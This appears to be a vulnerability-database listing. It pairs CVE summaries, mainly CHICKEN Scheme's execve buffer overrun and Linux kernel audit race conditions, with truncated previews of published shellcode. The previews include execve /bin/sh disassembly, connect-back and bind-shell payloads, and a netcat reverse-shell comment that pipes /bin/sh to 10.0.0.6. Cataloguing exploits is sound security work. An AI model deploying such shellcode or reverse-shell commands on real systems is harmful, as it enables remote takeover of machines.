Buffer overflow

The "process-execute" and "process-spawn" procedures in CHICKEN Scheme used fixed-size buffers for holding the arguments and environment variables to use in its execve call. This would allow user-supplied argument/environment variable lists to trigger a buffer overrun. This affects all releases o...

CVE-2016-6830

The "process-execute" and "process-spawn" procedures in CHICKEN Scheme used fixed-size buffers for holding the arguments and environment variables to use in its execve call. This would allow user-supplied argument/environment variable lists to trigger a buffer overrun. This affects all releases o...

DEBIAN-CVE-2016-6831

The "process-execute" and "process-spawn" procedures did not free memory correctly when the execve call failed, resulting in a memory leak. This could be abused by an attacker to cause resource exhaustion or a denial of service. This affects all releases of CHICKEN up to and including 4.11 it wil...

CVE-2016-6830

The CVE-2016-6830 vulnerability affects CHICKEN Scheme: the process-execute and process-spawn procedures used fixed-size buffers for arguments and environment variables in execve(), enabling buffer overruns from user-supplied lists. Affected releases include all versions up to 4.11; fixes are pla...

CVE-2016-6830

The "process-execute" and "process-spawn" procedures in CHICKEN Scheme used fixed-size buffers for holding the arguments and environment variables to use in its execve call. This would allow user-supplied argument/environment variable lists to trigger a buffer overrun. This affects all releases o...

CVE-2016-6830

The "process-execute" and "process-spawn" procedures in CHICKEN Scheme used fixed-size buffers for holding the arguments and environment variables to use in its execve call. This would allow user-supplied argument/environment variable lists to trigger a buffer overrun. This affects all releases o...

PT-2017-9029 · Chicken +1 · Chicken Scheme +1

Name of the Vulnerable Software and Affected Versions: CHICKEN Scheme versions prior to 4.12 Description: The issue arises from the "process-execute" and "process-spawn" procedures in CHICKEN Scheme, which utilize fixed-size buffers to hold arguments and environment variables for the execve call...

Linux/x86 - /bin/bash -c Arbitrary Command Execution Shellcode (72 bytes)

/ ;author: Filippo "zinzloun" Bersani ;date: 16/12/2016 ;version: 1.0 ;X86 Assembly/NASM Syntax ;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit ; Linux ubuntu 3.13.0-100-generic 147precise1-Ubuntu 32bit ; Linux bb32 4.4.0-45-generic 32bit ;72 bytes ;description: executes arbitrary command...

Linux/x86 - /bin/bash -c Arbitrary Command Execution Shellcode (72 bytes)

Linux/x86 - /bin/bash -c Arbitrary Command Execution Shellcode 72 bytes. Shellcode exploit for Linx86 platform / ;author: Filippo "zinzloun" Bersani ;date: 16/12/2016 ;version: 1.0 ;X86 Assembly/NASM Syntax ;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit ; Linux ubuntu 3.13.0-100-generic...

kernel: Race condition vulnerability in execve argv arguments

When creating audit records for parameters to executed children processes, an attacker can convince the Linux kernel audit subsystem can create corrupt records which may allow an attacker to misrepresent or evade logging of executing commands...

kernel: Race condition vulnerability in execve argv arguments

When creating audit records for parameters to executed children processes, an attacker can convince the Linux kernel audit subsystem can create corrupt records which may allow an attacker to misrepresent or evade logging of executing commands...

PT-2019-16759 · Linux +3 · Linux Kernel +3

Name of the Vulnerable Software and Affected Versions: Linux kernel versions prior to 4.8 Description: A race condition in the perf event open function allows local attackers to leak sensitive data from setuid programs. This occurs because no relevant locks, specifically the cred guard mutex, are...

DSA-3659-1 linux - security update

Bulletin has no description...

DEBIAN-CVE-2016-6136

Race condition in the auditlogsingleexecvearg function in kernel/auditsc.c in the Linux kernel through 4.7 allows local users to bypass intended character-set restrictions or disrupt system-call auditing by changing a certain string, aka a "double fetch" vulnerability...

Linux/x86 - execve /bin/sh Shellcode (19 bytes)

Linux/x86 - execve /bin/sh Shellcode 19 bytes. Shellcode exploit for Linx86 platform / Linux/x86 - execve /bin/sh shellcode 19 bytes Author: sajith Tested on: i686 GNU/Linux Shellcode Length: 19 SLAE - 750 Disassembly of section .text: 08048060 : 8048060: 31 c0 xor eax,eax 8048062: 50 push eax...

Linux/x86 - execve /bin/sh Shellcode (19 bytes)

/ Linux/x86 - execve /bin/sh shellcode 19 bytes Author: sajith Tested on: i686 GNU/Linux Shellcode Length: 19 SLAE - 750 Disassembly of section .text: 08048060 : 8048060: 31 c0 xor eax,eax 8048062: 50 push eax 8048063: 68 2f 2f 73 68 push 0x68732f2f 8048068: 68 2f 62 69 6e push 0x6e69622f 804806d...

Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)

/ Title: Axis Communication Linux/CRISv32 - Connect Back Shellcode Author: bashis / 2016 / include char sc = //close0 "\x7a\x86" // clear.d r10 "\x5f\x9c\x06\x00" // movu.w 0x6,r9 "\x3d\xe9" // break 13 //close1 "\x41\xa2" // moveq 1,r10 "\x5f\x9c\x06\x00" // movu.w 0x6,r9 "\x3d\xe9" // break 13...

Linux Netcat Reverse Shell - 32bit - 77 bytes

Linux Netcat Reverse Shell - 32bit - 77 bytes. Shellcode exploit for linx86 platform include include //[email protected] //OffSec ID: OS-20614 / global start start: ;/bin//nc -e///bin/sh 10.0.0.6 99 xor eax,eax ; clear eax xor edx,edx ; clear edi ; 0xIN-LAST IN-FIRST push 0x3939393...

Linux x86_64 execve Shellcode - 15 bytes

Linux x8664 execve Shellcode - 15 bytes. Shellcode exploit for linx86-64 platform include include // OS-20614 // [email protected] / global start start: execve: mov rsi, rax mov rdx, rsi mov r12 , 0x68732f6e69622f push r12 push rsp pop rdi mov al, 0x3b syscall / unsigned char code ...

Linux ARM Big Endian Command Shell, Bind TCP Inline

Listen for a connection and spawn a command shell This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 118 include Msf::Payload::Single include Msf::Sessions::CommandShellOptions def...